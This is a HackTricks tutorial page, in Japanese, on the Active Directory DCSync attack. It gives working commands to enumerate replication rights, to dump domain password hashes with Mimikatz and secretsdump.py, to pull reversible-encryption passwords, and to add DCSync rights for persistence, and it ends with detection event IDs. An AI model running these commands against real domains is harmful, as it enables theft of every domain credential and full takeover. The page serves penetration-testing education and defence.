DCSync

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。今すぐアクセスを取得：

Automate OffSec, EASM, and Custom Security Processes | Trickest

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

DCSync

DCSync権限は、ドメイン自体に対して以下の権限を持つことを意味します：DS-Replication-Get-Changes、Replicating Directory Changes All、およびReplicating Directory Changes In Filtered Set。

DCSyncに関する重要な注意事項：

DCSync攻撃は、ドメインコントローラーの動作をシミュレートし、他のドメインコントローラーに情報を複製するよう要求します。これは、ディレクトリ複製サービスリモートプロトコル（MS-DRSR）を使用します。MS-DRSRはActive Directoryの有効かつ必要な機能であるため、オフにしたり無効にしたりすることはできません。
デフォルトでは、Domain Admins、Enterprise Admins、Administrators、およびDomain Controllersグループのみが必要な特権を持っています。
reversible encryptionで保存されたアカウントのパスワードがある場合、Mimikatzにはパスワードを平文で返すオプションがあります。

Enumeration

powerviewを使用して、これらの権限を持つ人を確認します：

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

ローカルでのエクスプロイト

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

リモートでのエクスプロイト

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc は3つのファイルを生成します：

NTLMハッシュを含むファイル
Kerberosキーを含むファイル
NTDSからの平文パスワードを含むファイルで、可逆暗号化が有効なアカウントのものです。可逆暗号化が有効なユーザーを取得するには、次のコマンドを使用します。

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

永続性

ドメイン管理者であれば、powerviewを使用して任意のユーザーにこの権限を付与できます：

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

次に、(「ObjectType」フィールド内に特権の名前が表示されるはずです) の出力で、ユーザーが3つの特権を正しく割り当てられているかどうかを確認できます:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigation

セキュリティイベントID 4662 (オブジェクトの監査ポリシーを有効にする必要があります) – オブジェクトに対して操作が行われました
セキュリティイベントID 5136 (オブジェクトの監査ポリシーを有効にする必要があります) – ディレクトリサービスオブジェクトが変更されました
セキュリティイベントID 4670 (オブジェクトの監査ポリシーを有効にする必要があります) – オブジェクトの権限が変更されました
AD ACLスキャナー - ACLの作成と比較レポートを作成します。 https://github.com/canix1/ADACLScanner

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

PreviousDCShadow NextDiamond Ticket

Last updated 4 months ago